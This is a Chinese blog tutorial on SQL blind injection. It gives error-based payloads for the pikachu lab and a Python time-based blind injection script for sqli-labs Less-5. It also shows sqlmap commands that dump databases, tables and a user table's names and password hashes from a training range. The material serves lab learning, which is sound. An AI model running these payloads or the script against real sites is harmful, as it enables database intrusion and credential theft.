SQL盲注之python脚本爆破及sqlmap基础操作

最新推荐文章于 2024-05-15 17:50:57 发布
最新推荐文章于 2024-05-15 17:50:57 发布
阅读量6.1k 收藏 15
点赞数 5
文章标签: python 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangringyi/article/details/124040607
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

  • 前言
  • 一、SQL盲注是什么?
  • 二、介绍与使用
    • 1.盲注的三种分类
    • 2.基于报错的盲注
    • 3.基于时间的脚本化盲注
  • sqlmap的使用

前言

        哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。

一、SQL盲注是什么?

        经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的认识,然而在大部分情况下,注入语句是无回显的,无法从浏览器上看到数据库的相关信息,这个时候我们就需要用到相关的报错或盲注进行后续操作。同时为手工注入时,提前预知或了解其SQL语句的大概写法。所谓盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试。

二、介绍与使用

1.1.盲注的三种分类

        盲注大致可以分为下面三类:

                1.bool型:

                        即真假逻辑判断,常见使用sql函数:

                        like 'ro%'     #判断ro或ro.. .是否成立
                        regexp '^xiaodi[a-z]'   #匹配xiaodi及xiaodi...等
                        if(条件,5,0)    #条件成立返回5反之返回0
                        sleep(5)     #sQI语句延时执行5秒
                        mid(a,b,c)     #从位置b开始,截取a字符串的c位
                        substr(a,b,c)    #从b位置开始,截取字符串a的c长度
                        left(database(),1),database() #left(a,b)从左侧截取a的前b位
                        length(database())=8   #判断数据库database ()名的长度
                        ord=ascii ascii(x)=97   #判断x的asci i码是否等于97

                2.报错的盲注:

                        floor,updatexml,extractvalue
                3.时间的盲注:

                        sleep

        这篇文章主要讲一下手工的报错盲注和,脚本化的时间盲注,当然最后会给大家介绍sql注入神器sqlmap,这里指在搞清楚注入原理。

                        

2.基于报错的盲注

        OK,讲到报错盲注这里我们需要借助一些工具和一些漏洞测试平台。我们开启我们的漏洞测试平台pikachu,再打开的burp抓包工具。(相信浏览器与burp的代理大家都会操作)

         

               运用我们上面介绍的updatexml函数,具体写法:     

username=wjlbt' or updatexml(1,concat(0x7e,(database())),0) or
'&password=123456&sex=man&phonenum=123456&email=123456&add=123456&submit=submit

         

 

         database()即获取当前数据库名,database()可以替换成任意SQL语句,以此来爆破表名,列名和相关数据。如果不知道怎么接着写,可以先去学一点数据库的知识

        而其他的extracvalue也是一样的操作方法

' or extractvalue(1,concat(0x7e,database())) or
'

        floor有点不同

' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e)))
from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
or '

 

        至于为什么要在前后加上引号,我们来看源码的SQL语句输入 

        

         这其实就是用引号来闭合语句,实际操作中可能是 '、''、')、'')等等,多试几次就可以了

    3.基于时间的脚本化盲注   

                其实写这篇文章就是为了展示这段脚本代码,写着写着就加了不少东西进去了

这是在SQLis漏洞平台的less-5中,参考了是阿明啊的SQLis通关。

 OK,上代码:

# coding:utf-8
import requests
import datetime
import time

def database_name():
    name = ''
    for j in range(1,40):#这个写大一点没事
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_D':
            url = "http://192.168.101.1/sqli-labs-master/Less-5/"
            # 根据网站响应速度选择时间
            payload = "?id=1' and sleep(if(substr(database(),%d,1)='%s',2,0)) --+" % (j,i)
            # 爆表
            # payload="?id=1' and sleep(if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',2,0)) --+" % (j,i)
            # 暴列
            # payload = "?id=1' and sleep(if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s',2,0)) --+" % (j, i)
            time1 = datetime.datetime.now()
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >=2:
                name += i
                print(name)
                break
    print('database_name:', name)


if __name__ == '__main__':
    database_name()

 显示数据库名:

爆表 

 

后面暴列和数据差不多

sqlmap的使用:

        这里我们使用墨者学院的在线靶场做实验

 

 

 

 sqlmap下载安装完成后:

执行python sqlmap.py -u URL --dbs       即获取注入点所有数据库

python sqlmap.py -u "http://124.70.64.48:46228/new_list.php?id=tingjigonggao" --dbs

  python sqlmap.py -u URL  -D"(获取的数据库名)" --tables     获取当前数据库下所有表

python sqlmap.py -u "http://124.70.64.48:46228/new_list.php?id=tingjigonggao" -D"mozhe_discuz_stormgroup"  --tables

  python sqlmap.py -u URL  -D"(获取的数据库名)" -T"(获取的表名)" --columns      获取列名

python sqlmap.py -u "http://124.70.64.48:46228/new_list.php?id=tingjigonggao" -D"mozhe_discuz_stormgroup" -T"stormgroup_member" --columns

 python sqlmap.py -u URL  -D"(获取的数据库名)" -T"(获取的表名)" -C"(获取的列名)" --dump      打印数据

python sqlmap.py -u "http://124.70.64.48:46228/new_list.php?id=tingjigonggao" -D"mozhe_discuz_stormgroup" -T"stormgroup_member" -C"name,password" --dump

 密码经过MD5加密,网上搜一下解密就OK啦

我叫萝卜头
关注
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
sqlmap工具学习记
m0_70483044的博客
07-20 610
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL入漏洞,获取数据库服务器的权限。Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。是sql入方面一个强大的工具!...
sqlmap工具的使用 (超详细附工具版)_python sqlmap,2024最新网络安全面经分享
2301_79098082的博客
04-04 933
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
python | sqlmap,一个实用的 Python 库!
最新发布
csdn_xmj的博客
05-15 933
sqlmap是一个强大的自动化SQL入工具,专为检测、利用和管理数据库的SQL入漏洞设计。它支持广泛的数据库系统,能自动识别入点,并通过多种技术执行详尽的数据库、表、数据提取。sqlmap的功能包括获取数据库版本信息、数据提取、访问底层文件系统和执行远程命令,甚至允许植入后门。该工具不仅适用于网络安全专家进行安全审计和渗透测试,也广泛用于安全教育和培训,帮助了解和防范SQL入攻击。通过其命令行界面和API,sqlmap为自动化测试提供了极大的便利,是网络安全领域中不可或缺的工具。
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9161
SQLMAP是一款由Python开发的自动化SQL入工具,其主要功能是扫描、发现并利用SQL入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQLSQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的入,即可根据返回页面判断条件真假的入;基于时间的,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
sqlmap使用介绍(一、基本使用)
风过江南乱的博客
07-28 1682
一、功能介绍 最直白的可以协助你进行sql入,获取有用信息,一些简单的入甚至可以用它一把梭。 最基本的,当你给一个可能有sql入的url时,它能判断可入的参数、判断可以用那种SQL入技术来入、识别出哪种数据库、据用户选择读取哪些数据。 再就是高大上的官方介绍,可自动执行SQL入缺陷的检测和开发过程,并接管数据库服务器。它有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据库
sqlmap及其python依赖环境的安装
yk2909438315的博客
04-08 2018
由于环境的不同,安装过程中可能会遇到各种各样的问题,不用慌,先根据错误提示搜索,多试一下。因为sqlmap是用python语言编写的,所以需要先安装python环境。因为只能在sqlmap目录下使用命令,为了方便在任何地方使用,添加环境变量。只需要双击这个快捷方式,就可以进入sqlmap路径使用sqlmap命令。这时候就可以在任何地方使用sqlmap命令,也不需要带py后缀了。如果sqlmap.py不行,就用python sqlmap.py。如果是win10,编辑Path的时候是新建变量,不需要分号分隔。
pythonSQL入仿写SQLMAP脚本.rar
09-26
Python SQL入仿写SQLMAP脚本是针对网络安全领域的一个实践项目,主要涉及到的是利用Python编程语言来模拟著名的自动化SQL入工具SQLMAP的功能。SQL入是一种常见的网络安全漏洞,攻击者通过构造特殊的SQL语句来...
SQL住入原始脚本_SQLpython脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL入技术来编写或执行的原始SQL命令,而“SQLpython脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL入攻击主要有三种类型:直列入、延时...
Web应用手工渗透测试——用SQLMap进行SQL测试
02-26
本文将更进一步,讨论SQL,如果读者没有任何相关知识储备,建议先去wikipedia学习一下。在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASPMutillidae环境搭建好之后先册一个...
sql入攻击之sqlmap
06-10
使用SQLMap时,你需要了解一些基本的命令行参数和选项,例如`--dbs`用于列举所有可用的数据库,`--tables`列出特定数据库中的表格,`--columns`显示表格中的列,而`--dump`则用于提取数据。更高级的用法包括使用`--...
java开发基于SQLmapSQL入工具源码.zip
06-01
安装JDK(需要有javafx) 安装Python 安装SQLmap基于SQLmapSQL入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap基于SQLmapSQL入工具源码.。基于SQLmap,...
sqlmap安装
11-13
Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL入漏洞以及接入该数据库的服务器。
网安入门05-Sql入(布尔&SqlMap
m0_61499194的博客
12-13 970
常规:python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" --tables -D security
SQL入爆库渗透测试(初学者必看)
yi152787的博客
04-30 1906
爆库原理基本一致的,也许站点不同但只要存在sql入则需要进行数据库爆破,步骤及使用的参数基本相同,对参数不够熟悉的网友可以去某百某博查看相关信息,本次实验结束,本文章仅提供参考,请勿在未授权的情况下进行测试。本次实验利用sqlmap爆破工具对SQL靶场进行渗透测试(数据库爆破),最终目标:拿到用户名和密码,实验中页面出现的用户名密码可忽略,真实实战中一般不会直接爆出用户名和密码的。5.在security爆出users,已确定目标所在,进行第三步爆破 所使用到的参数 -D -T --colimn;
在kali上使用sqlmap进行爆破
learninger12的博客
02-13 6260
sqlmap进行爆破 接下来看一下sqlmap的版本: 我们进行爆破的时候,一定要找有入点的,比如这样的: 再来一个没有入的,来做一下对比: 这里我们就可以看的出来,在地址栏中,我们会发现,有入的,在网址的最后面会有一些不同的东西,没有入的就没有东西,我们要找的就是有入的东西,这样我们才能对网站进行爆破,下面进行爆破,获取网站的一些基本信息: 看上图的下方区域,我们可以清楚的看到一些基础信息,这里就不过多的解释了。 接下来是查...
SQL入漏洞扫描---sqlmap
嘿嘿嘿
05-03 2376
数据库--数据表---字段---字段内容一站式识别
Sqlmap 随记
orchid_sea的博客
04-27 758
sqlmap安装 linux环境下键入命令 apt install sqlmap 老师说,如果遇到如图问题,把文件删掉重新安装就好了;但是呢,按照这个方式我没有解决掉。 那就重新安装sqlmap和依赖库吧: 按照提示,先更新一下apt工具 apt-get update 工具更新完再安装sqlmap 安装完就能成功进入sqlmapsqlmap GETsqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_str.php?name=a
BurpSuite 爆破 SQL
MZa1213123的博客
03-03 2087
靶场 用 burpsuite 进行抓包 (最好是用专业版 可以设置多线程快速爆破) 右键该页面 Send to Intruder 首先将 Attack type 改为 Cluster bomb 接着 Clear 清除全部变量 然后 Add 变量到 username 和 password 的地方 设置 payload payload 1 选择 Runtime file 也就是自己选择的字典 我这个是 kali 自带的 SQL.txt payload 2 选择 Simple lis
Sqlmap入门爆库、爆表、爆字段、爆记录
weixin_56306210的博客
10-31 2168
Sqlmap爆库、爆表、爆字段、爆记录
pythonsqldvwa
09-23
PythonSQL是指通过构造特定的SQL语句来绕过应用程序的安全机制,并获取未经授权的数据。在DVWA漏洞测试环境中进行SQL,可以使用sqlmap工具。下面是使用sqlmap进行DVWA的SQL的步骤: 1. 首先,确保你已经安装了sqlmap工具并配置好环境。 2. 使用命令行进入到sqlmap工具所在的目录。 3. 输入以下命令,获取数据库dvwa的所有表: ``` python sqlmap.py -u "http://192.168.101.66/bachang/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=n2nqkt6qqt524ehqmae57srcu6" --tables -D dvwa ``` 4. 输入以下命令,获取数据库表users的所有列: ``` python sqlmap.py -u "http://192.168.101.66/bachang/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=n2nqkt6qqt524ehqmae57srcu6" --columns -D dvwa -T users ``` 通过以上步骤,你可以使用sqlmap工具进行DVWA的SQL,获取数据库表和列的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值